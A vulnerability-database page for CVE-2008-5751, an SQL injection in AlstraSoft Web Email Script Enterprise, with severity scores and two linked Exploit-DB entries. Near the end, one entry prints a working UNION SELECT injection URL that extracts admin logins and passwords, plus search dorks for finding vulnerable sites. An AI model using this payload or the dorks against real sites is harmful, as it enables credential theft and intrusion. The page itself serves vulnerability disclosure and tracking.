CVE-2008-5751
published 2008-12-30CVE-2008-5751: SQL injection vulnerability in index.php in AlstraSoft Web Email Script Enterprise (ESE) allows remote attackers to execute arbitrary SQL commands via the id…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.7th percentile
SQL injection vulnerability in index.php in AlstraSoft Web Email Script Enterprise (ESE) allows remote attackers to execute arbitrary SQL commands via the id parameter in a directory action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alstrasoft | web_email_script_enterprise | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities
exploitdb·2010-10-27
CVE-2008-5751 Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities
Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities
---
AlstraSoft E-Friends 4.96 Multiple Remote Vulnerabilities
Name AlstraSoft E-Friends
Vendor http://www.alstrasoft.com
Versions Affected 4.96
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-10-27
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
AlstraSoft E-Friends is an online social networking
software that allows you to start your own site just like
Friendster and MySpace.
Other versions could be vulnerable.
II. DESCRIPTION
Many parameters are not properly sanitised before being
used in SQL queries and from the PHP's upload functions.
III. ANALYSIS
Summary:
A) Arbitrary
Exploit-DB
Alstrasoft Web Email Script Enterprise - 'id' SQL Injection
exploitdb·2008-12-28
CVE-2008-5751 Alstrasoft Web Email Script Enterprise - 'id' SQL Injection
Alstrasoft Web Email Script Enterprise - 'id' SQL Injection
---
--AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln.
############################################
Yazar(Auth0r): Bgh7
Site: Http://ozelteam.com Turk Bılısım Guclerı
PsT: ByBgh7 [at] msn [d0t] c0m
############################################
--Script: http://www.alstrasoft.com/disposable-email-script.htm
--Dork: AlstraSoft Web "ESE"
--Dork2: AlstraSoft Web Email Script Enterprise
--Expl0it;
--http://web.xxx /Script/ index.php?Act=directory&joinstatus=awesewise&id=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin
#########
column_name
İd
Passwd
No writeups or analysis indexed.
2008-12-30
Published